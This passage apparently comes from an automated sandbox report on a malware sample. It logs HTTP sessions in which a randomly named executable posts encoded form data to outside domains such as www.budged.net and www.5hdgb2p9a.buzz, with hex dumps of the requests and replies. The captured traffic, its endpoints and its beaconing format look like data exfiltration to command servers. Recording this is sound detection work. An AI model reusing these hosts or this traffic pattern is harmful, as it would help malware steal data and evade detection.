                                                        Data Raw: 65 4c 2d 78 3d 4a 57 50 58 6a 4b 79 71 6f 51 47 4a 72 77 45 79 4b 54 68 34 39 6a 2b 43 77 2b 77 59 36 44 5a 6e 4c 30 67 55 31 79 44 6c 4e 46 37 41 67 41 4b 76 46 62 57 52 53 47 4d 35 30 55 54 65 55 47 46 63 44 61 35 32 30 34 4b 34 62 42 66 6e 34 7a 42 70 4f 47 61 33 4c 75 51 67 6f 33 49 54 78 6b 6e 31 71 4d 39 77 64 77 42 68 44 54 56 78 31 4e 68 71 2f 75 57 50 54 68 66 67 45 6b 51 64 56 34 65 67 50 59 6e 58 6a 59 32 4c 6b 68 48 65 57 56 74 55 75 78 45 62 74 79 76 49 4d 45 50 4e 61 4a 72 71 48 43 33 72 47 38 4d 56 48 73 6a 78 78 75 36 4c 50 34 32 41 42 6f 50 6e 56 78 66 64 51 50 66 6e 32 70 44 4c 2b 66 78 70 36 6b 55 48 50 75 39 71 32 51 3d 3d
                                                        Data Ascii: eL-x=JWPXjKyqoQGJrwEyKTh49j+Cw+wY6DZnL0gU1yDlNF7AgAKvFbWRSGM50UTeUGFcDa5204K4bBfn4zBpOGa3LuQgo3ITxkn1qM9wdwBhDTVx1Nhq/uWPThfgEkQdV4egPYnXjY2LkhHeWVtUuxEbtyvIMEPNaJrqHC3rG8MVHsjxxu6LP42ABoPnVxfdQPfn2pDL+fxp6kUHPu9q2Q==


                                                         Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                         7           192.168.2.10  49980        195.154.200.15  80                6584  C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
                                                         Timestamp                           Bytes transferred  Direction  Data
                                                         Nov 7, 2024 15:50:57.188424110 CET  1801               OUT        POST /zslv/ HTTP/1.1
                                                        Host: www.budged.net
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.budged.net
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Length: 1229
                                                        Referer: http://www.budged.net/zslv/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
                                                        Data Raw: 65 4c 2d 78 3d 4a 57 50 58 6a 4b 79 71 6f 51 47 4a 72 77 45 79 4b 54 68 34 39 6a 2b 43 77 2b 77 59 36 44 5a 6e 4c 30 67 55 31 79 44 6c 4e 46 44 41 6a 7a 53 76 45 34 2b 52 54 47 4d 35 2b 30 54 6c 55 47 46 37 44 65 64 79 30 34 48 4e 62 44 58 6e 35 51 4a 70 4c 33 61 33 41 75 51 67 71 33 49 53 73 55 6e 67 71 4d 74 30 64 78 78 68 44 54 56 78 31 4c 46 71 37 2f 57 50 56 68 66 6a 4e 45 51 42 52 34 65 49 50 63 44 74 6a 65 72 32 6b 78 6e 65 57 31 64 55 73 48 6f 62 79 43 76 4f 41 6b 4f 49 61 4f 6a 70 48 43 61 53 47 38 4a 2b 48 73 62 78 31 61 62 75 54 38 2b 44 63 71 57 6d 65 77 62 6c 43 61 2f 59 78 70 36 37 2b 2b 64 74 6d 6c 4a 4a 62 75 77 6a 67 55 48 4f 54 36 6e 4d 6d 46 76 4a 42 32 2f 35 4e 58 4e 77 34 36 32 63 51 6f 4e 5a 36 47 75 5a 2f 31 44 6f 54 4f 63 74 2f 6a 38 54 7a 35 43 41 36 2b 46 45 53 46 68 47 4c 39 71 5a 50 37 65 5a 66 56 68 69 35 6d 74 74 4d 62 2b 70 77 49 78 52 46 41 4c 34 50 77 71 41 74 63 6c 78 55 42 66 71 6e 43 75 35 78 30 49 31 4e 74 49 39 6b 55 58 6f 4a 30 59 43 76 78 43 30 45 79 35 4d 31 [TRUNCATED]
                                                        Data Ascii: eL-x=JWPXjKyqoQGJrwEyKTh49j+Cw+wY6DZnL0gU1yDlNFDAjzSvE4+RTGM5+0TlUGF7Dedy04HNbDXn5QJpL3a3AuQgq3ISsUngqMt0dxxhDTVx1LFq7/WPVhfjNEQBR4eIPcDtjer2kxneW1dUsHobyCvOAkOIaOjpHCaSG8J+Hsbx1abuT8+DcqWmewblCa/Yxp67++dtmlJJbuwjgUHOT6nMmFvJB2/5NXNw462cQoNZ6GuZ/1DoTOct/j8Tz5CA6+FESFhGL9qZP7eZfVhi5mttMb+pwIxRFAL4PwqAtclxUBfqnCu5x0I1NtI9kUXoJ0YCvxC0Ey5M1f2BGEGH5FzybVkxQ5yk7V7lvZZ8YKcVznpq2AX+MNCqU15lv3RWu0IfhF/QQS04KhGSyJQbyeTpJdRtSNgto7H4xIyieVLE7UuUo1QSjEA94qIuRxwyDhyNmaRP2fnk47K13SvPtaLAvOo0Y+K5FglovI9s2tDNCJEiymDjgRlSlpDY31FhIEMLU/OX4MT2J8W7E60wEji9kJPEGD6O5tDxPpd/ejqCcdNjFSFn8qmDkn22PtBnsFypVmTZP+igpz/uEBp78Jph5hucHns3yoK+d3QARHCajiKJmGyo+5imynGzSETrwwpbqQh7FCXl7fn3cqNIxxnXfiFEp0cUPEDXTHFCl9sMsFAIDBk44SbWUauNyl+oO5fQ1gOhqSzasutpvkAB+3K1t4hK1LDEkItJXifCplA1vzP1K9lnzci/gee5VKjnxkT6Ebtz6M8Yy5euRkT+tR5dcDUJcx/Fhy2iujDAUrQV9KcRq5j1B0ct8/uhUU9KpQLMlNorDjeDX4ubiJhrcsXWscXdqFiz+xx0nKw9sJYba3MHdcXQp/fECrMiEt0G59SHJ/TRK+Ce1VjPjXWBw53omxSQTyONKXrMmSA6sYDm/NwGMph/ZGz/WqKXc8HZQFg6kQfuykXdHxB5IWWqXy/6kUQCYoS9TOEHORCsTDKv197 [TRUNCATED]


                                                         Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                         8           192.168.2.10  49981        195.154.200.15  80                6584  C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
                                                         Timestamp                           Bytes transferred  Direction  Data
                                                         Nov 7, 2024 15:50:59.730701923 CET  514                OUT        GET /zslv/?eL-x=EUn3g8LYsBqqsV8ZNTlu3xKd6tkG7Tp6GSwv0X2RMky81SP9KPrWQ2UszFzoalUNSIFimuT2bUDct3BiYGyyefEtviAnix38iMVeAihtAydc/vF2ig==&wFVH=-zwTKPF0iPth HTTP/1.1
                                                        Host: www.budged.net
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
                                                         Nov 7, 2024 15:51:01.318531990 CET  1236               IN         HTTP/1.0 404 Not Found
                                                        Date: Thu, 07 Nov 2024 14:51:00 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.33
                                                        X-Powered-By: PHP/7.4.33
                                                        Content-Length: 1840
                                                        Connection: close
                                                        Content-Type: text/html; charset=UTF-8
                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 23 6e 6f 74 66 6f 75 6e 64 20 7b 0a 20 20 20 20 [TRUNCATED]
                                                        Data Ascii: <!doctype html><html lang="en"><head> <meta charset="UTF-8"> <title>404</title> <style> * { -webkit-box-sizing: border-box; box-sizing: border-box } body { font-family: sans-serif; padding: 0; margin: 0 } #notfound { position: relative; height: 100vh } #notfound .notfound { position: absolute; left: 50%; top: 50%; -webkit-transform: translate(-50%, -50%); -ms-transform: translate(-50%, -50%); transform: translate(-50%, -50%) } .notfound { max-width: 767px; width: 100%; line-height: 1.4; padding: 0 15px } .notfound .notfound-404 { position: relative; height: 150px; line-height: 150px; margin-bottom: 25px } .notfound .not
                                                         Nov 7, 2024 15:51:01.318639040 CET  836                IN         Data Raw: 66 6f 75 6e 64 2d 34 30 34 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 36 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 20 20 20 20 20
                                                        Data Ascii: found-404 h1 { font-size: 186px; font-weight: 900; margin: 0; text-transform: uppercase; } .notfound h2 { font-size: 26px; font-weight: 700; m


                                                         Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                         9           192.168.2.10  49982        168.76.221.252  80                6584  C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
                                                         Timestamp                           Bytes transferred  Direction  Data
                                                         Nov 7, 2024 15:51:06.939676046 CET  776                OUT        POST /nl7t/ HTTP/1.1
                                                        Host: www.5hdgb2p9a.buzz
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.5hdgb2p9a.buzz
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Length: 193
                                                        Referer: http://www.5hdgb2p9a.buzz/nl7t/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
                                                        Data Raw: 65 4c 2d 78 3d 63 55 45 67 53 37 50 6f 6b 37 70 54 53 4f 46 70 34 32 50 35 6d 55 52 35 54 4c 32 79 32 6e 30 6b 37 4b 67 51 45 43 78 45 4f 66 71 74 72 42 64 64 36 4b 35 47 56 58 42 50 7a 68 42 41 4b 79 54 6f 71 2b 76 64 77 58 76 44 55 70 74 41 35 66 67 70 6a 76 31 57 6e 44 39 73 59 76 75 54 6f 36 71 51 59 42 74 72 64 75 55 67 47 59 6b 6a 79 36 49 32 34 43 38 43 46 51 6d 43 70 57 63 70 30 32 2f 6e 4a 4b 65 66 58 74 6d 57 61 42 4c 64 2b 4e 52 47 35 42 6f 33 39 32 43 6a 50 55 39 42 52 45 74 67 4e 4c 33 43 77 72 43 49 65 4f 55 6e 38 2b 65 6e 30 71 72 30 68 35 53 74 53 58 68 2b
                                                        Data Ascii: eL-x=cUEgS7Pok7pTSOFp42P5mUR5TL2y2n0k7KgQECxEOfqtrBdd6K5GVXBPzhBAKyToq+vdwXvDUptA5fgpjv1WnD9sYvuTo6qQYBtrduUgGYkjy6I24C8CFQmCpWcp02/nJKefXtmWaBLd+NRG5Bo392CjPU9BREtgNL3CwrCIeOUn8+en0qr0h5StSXh+


                                                         Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                         10          192.168.2.10  49983        168.76.221.252  80                6584  C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
                                                         Timestamp                           Bytes transferred  Direction  Data
                                                         Nov 7, 2024 15:51:09.582758904 CET  800                OUT        POST /nl7t/ HTTP/1.1
                                                        Host: www.5hdgb2p9a.buzz
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.5hdgb2p9a.buzz
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Length: 217
                                                        Referer: http://www.5hdgb2p9a.buzz/nl7t/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
                                                        Data Raw: 65 4c 2d 78 3d 63 55 45 67 53 37 50 6f 6b 37 70 54 54 74 64 70 2f 58 50 35 75 55 52 36 5a 72 32 79 2f 48 30 67 37 4b 6b 51 45 44 45 4a 53 38 43 74 72 6c 5a 64 37 4f 74 47 55 58 42 50 72 78 42 2f 4f 79 53 6b 71 2b 6a 37 77 53 58 44 55 76 42 41 35 65 51 70 6a 63 64 52 6e 54 39 75 56 50 75 52 73 36 71 51 59 42 74 72 64 75 42 37 47 59 38 6a 7a 4a 51 32 35 6d 6f 42 4d 77 6d 46 2b 6d 63 70 6c 6d 2f 72 4a 4b 65 74 58 76 54 78 61 43 7a 64 2b 4d 68 47 2b 55 49 30 6f 6d 43 35 46 30 39 54 41 42 30 72 4e 4b 6e 79 31 5a 75 49 43 38 31 44 37 66 6a 67 6c 37 4b 6a 79 4f 4f 6a 63 52 55 55 41 77 6e 4e 67 53 49 37 37 30 70 65 59 4d 55 32 46 4b 48 4f 64 67 3d 3d
                                                        Data Ascii: eL-x=cUEgS7Pok7pTTtdp/XP5uUR6Zr2y/H0g7KkQEDEJS8CtrlZd7OtGUXBPrxB/OySkq+j7wSXDUvBA5eQpjcdRnT9uVPuRs6qQYBtrduB7GY8jzJQ25moBMwmF+mcplm/rJKetXvTxaCzd+MhG+UI0omC5F09TAB0rNKny1ZuIC81D7fjgl7KjyOOjcRUUAwnNgSI770peYMU2FKHOdg==


                                                         Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                         11          192.168.2.10  49984        168.76.221.252  80                6584  C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
                                                         Timestamp                           Bytes transferred  Direction  Data
                                                         Nov 7, 2024 15:51:12.125232935 CET  1813               OUT        POST /nl7t/ HTTP/1.1
                                                        Host: www.5hdgb2p9a.buzz
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.5hdgb2p9a.buzz
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Length: 1229
                                                        Referer: http://www.5hdgb2p9a.buzz/nl7t/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
                                                        Data Raw: 65 4c 2d 78 3d 63 55 45 67 53 37 50 6f 6b 37 70 54 54 74 64 70 2f 58 50 35 75 55 52 36 5a 72 32 79 2f 48 30 67 37 4b 6b 51 45 44 45 4a 53 38 61 74 6f 51 4e 64 37 70 52 47 54 58 42 50 31 68 42 36 4f 79 53 74 71 2b 37 6e 77 53 4b 30 55 71 64 41 34 34 6b 70 7a 74 64 52 2b 6a 39 75 63 76 75 53 6f 36 72 53 59 42 39 76 64 75 52 37 47 59 38 6a 7a 49 67 32 76 43 38 42 4b 77 6d 43 70 57 63 62 30 32 2f 48 4a 4b 58 59 58 76 58 4c 5a 7a 54 64 35 73 78 47 37 67 6f 30 31 57 43 2f 47 30 38 41 41 42 77 6b 4e 4f 48 59 31 63 36 69 43 2f 6c 44 35 36 4f 34 2b 4b 53 76 6c 76 2f 37 53 69 73 4b 50 46 48 77 70 43 6c 66 34 45 4a 6b 59 50 46 38 48 37 47 4a 4b 33 74 78 56 79 47 68 6f 44 58 73 46 2b 58 5a 2b 65 39 37 52 36 39 4d 72 43 79 35 79 6d 53 76 7a 44 37 79 38 36 75 45 6d 43 69 30 69 6b 4e 6f 6b 79 36 56 68 32 73 44 42 63 73 77 42 55 6e 34 37 64 75 30 75 2b 6b 65 58 64 4c 44 6c 4f 57 4b 4a 6c 45 62 30 68 48 35 50 66 68 70 68 4e 6a 45 30 43 31 70 36 31 54 75 33 75 64 58 76 64 4d 6f 79 66 73 6d 51 48 6c 66 6a 62 6e 59 31 [TRUNCATED]
                                                         Data Ascii: eL-x= [TRUNCATED]


                                                         Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                         12          192.168.2.10  49985        168.76.221.252  80                6584  C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
                                                         Timestamp                           Bytes transferred  Direction  Data
                                                         Nov 7, 2024 15:51:14.671600103 CET  518                OUT        GET /nl7t/?wFVH=-zwTKPF0iPth&eL-x=RWsARM6Yi7RnQLBC+16RpV9reqvPmlYamaxPbU5yIu+RywNq6+kGZBpb8CtNMSbq9u/pp337VPx8joE31Mh05zxcUPnHpfTXXTBrDMJcL7sQ64A9tw== HTTP/1.1
                                                        Host: www.5hdgb2p9a.buzz
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5


                                                         Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                         13          192.168.2.10  49986        150.95.254.16   80                6584  C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
                                                         Timestamp                           Bytes transferred  Direction  Data
                                                         Nov 7, 2024 15:51:21.336498022 CET  767                OUT        POST /bjtw/ HTTP/1.1
                                                        Host: www.j252mv.site
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.j252mv.site
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Length: 193
                                                        Referer: http://www.j252mv.site/bjtw/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
                                                        Data Raw: 65 4c 2d 78 3d 52 75 6c 4e 68 4b 56 6c 37 54 49 33 44 4b 62 6c 34 71 44 74 37 4c 65 4f 63 58 37 35 65 37 59 70 6e 37 64 6f 6a 7a 64 4b 4c 54 5a 6c 6d 56 56 77 45 2f 64 52 74 57 4b 69 5a 66 36 45 4d 34 78 2b 7a 31 6f 6e 34 4d 76 47 43 61 55 42 38 67 54 5a 7a 45 64 69 5a 6f 64 35 6f 66 57 42 47 76 36 2f 42 6e 34 50 65 7a 2f 4b 6f 69 79 55 31 71 73 66 37 36 30 4b 7a 70 38 4f 77 79 69 6c 33 32 70 42 4c 37 42 49 78 32 32 52 58 7a 5a 4e 79 51 4e 77 6e 43 49 43 4d 31 65 6d 64 76 2b 62 37 4e 55 57 6d 35 55 64 31 59 67 52 7a 77 4f 38 42 6d 5a 64 42 66 33 30 6f 32 61 59 31 46 50 33
                                                        Data Ascii: eL-x=RulNhKVl7TI3DKbl4qDt7LeOcX75e7Ypn7dojzdKLTZlmVVwE/dRtWKiZf6EM4x+z1on4MvGCaUB8gTZzEdiZod5ofWBGv6/Bn4Pez/KoiyU1qsf760Kzp8Owyil32pBL7BIx22RXzZNyQNwnCICM1emdv+b7NUWm5Ud1YgRzwO8BmZdBf30o2aY1FP3
                                                         Nov 7, 2024 15:51:22.206223965 CET  1236               IN         HTTP/1.1 404 Not Found
                                                        Date: Thu, 07 Nov 2024 14:51:22 GMT
                                                        Server: Apache
                                                        Last-Modified: Tue, 13 Sep 2022 05:17:25 GMT
                                                        Accept-Ranges: bytes
                                                        Content-Length: 1260
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 74 79 6c 65 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 63 72 69 70 74 2d 54 79 70 65 22 20 63 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="Content-Style-Type" content="text/css"><meta http-equiv="Content-Script-Type" content="text/javascript"><title>404 Error - Not Found</title><style type="text/css"></style></head><body><div id="contents"><center><h1><img src="http://www.gmo.jp/images/public/common/logo.gif" alt="GMO Internet, Inc."></h1><div id="main"><h1 class="title">404 Error - Not Found</h1><p class="detail">URL</p></br></br></br></br></br><a style="text-decoration: underline;" href="http://www.onamae-server.com/" target="_blank">.com </a> </div><div id="footer"></br><a href="http://www.onamae.com/?banner_id=634" target="_blank"> [TRUNCATED]
                                                         Nov 7, 2024 15:51:22.206278086 CET  237                IN         Data Raw: 81 aa e3 82 89 e3 81 8a e5 90 8d e5 89 8d 2e 63 6f 6d 26 6c 74 3b 50 52 26 67 74 3b 3c 2f 61 3e 0a 3c 68 34 20 63 6c 61 73 73 3d 22 63 6d 6e 6d 22 3e 47 4d 4f e3 82 a4 e3 83 b3 e3 82 bf e3 83 bc e3 83 8d e3 83 83 e3 83 88 e3 82 b0 e3 83 ab e3 83
                                                        Data Ascii: .com&lt;PR&gt;</a><h4 class="cmnm">GMO</h4><div align="center"><p>Copyright (c) GMO Internet Group, Inc. All Rights Reserved.</p></div></center></div></div></body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        14 | 192.168.2.10 | 49987 | 150.95.254.168 | 80 | 6584 | C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Nov 7, 2024 15:51:24.441174030 CET | 791 bytes | OUT | POST /bjtw/ HTTP/1.1
                                                        Host: www.j252mv.site
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.j252mv.site
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Length: 217
                                                        Referer: http://www.j252mv.site/bjtw/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
                                                        Data Raw: 65 4c 2d 78 3d 52 75 6c 4e 68 4b 56 6c 37 54 49 33 44 72 72 6c 72 35 37 74 36 72 65 4e 54 33 37 35 49 4c 59 74 6e 37 5a 6f 6a 77 52 61 4c 41 74 6c 6d 30 6c 77 46 36 78 52 6f 57 4b 69 58 2f 36 42 44 59 78 31 7a 31 56 61 34 4f 72 47 43 61 41 42 38 69 62 5a 77 7a 68 68 66 34 64 37 68 2f 57 44 49 50 36 2f 42 6e 34 50 65 7a 71 52 6f 69 71 55 32 5a 30 66 68 66 41 4a 39 4a 38 4e 6e 43 69 6c 68 47 70 4e 4c 37 42 2b 78 33 71 2f 58 77 78 4e 79 53 56 77 6e 54 49 42 44 31 65 6b 51 50 2f 4f 6f 66 5a 64 70 5a 73 4e 7a 65 49 46 73 6a 62 62 43 48 6b 61 51 4f 57 6a 37 42 47 57 37 44 36 64 47 2b 35 64 32 37 6d 43 78 68 4e 62 35 35 70 70 36 54 44 34 4a 67 3d 3d
                                                        Data Ascii: eL-x=RulNhKVl7TI3Drrlr57t6reNT375ILYtn7ZojwRaLAtlm0lwF6xRoWKiX/6BDYx1z1Va4OrGCaAB8ibZwzhhf4d7h/WDIP6/Bn4PezqRoiqU2Z0fhfAJ9J8NnCilhGpNL7B+x3q/XwxNySVwnTIBD1ekQP/OofZdpZsNzeIFsjbbCHkaQOWj7BGW7D6dG+5d27mCxhNb55pp6TD4Jg==
                                                        Nov 7, 2024 15:51:25.339709997 CET | 1236 bytes | IN | HTTP/1.1 404 Not Found
                                                        Date: Thu, 07 Nov 2024 14:51:25 GMT
                                                        Server: Apache
                                                        Last-Modified: Tue, 13 Sep 2022 05:17:25 GMT
                                                        Accept-Ranges: bytes
                                                        Content-Length: 1260
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 74 79 6c 65 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 63 72 69 70 74 2d 54 79 70 65 22 20 63 [TRUNCATED]
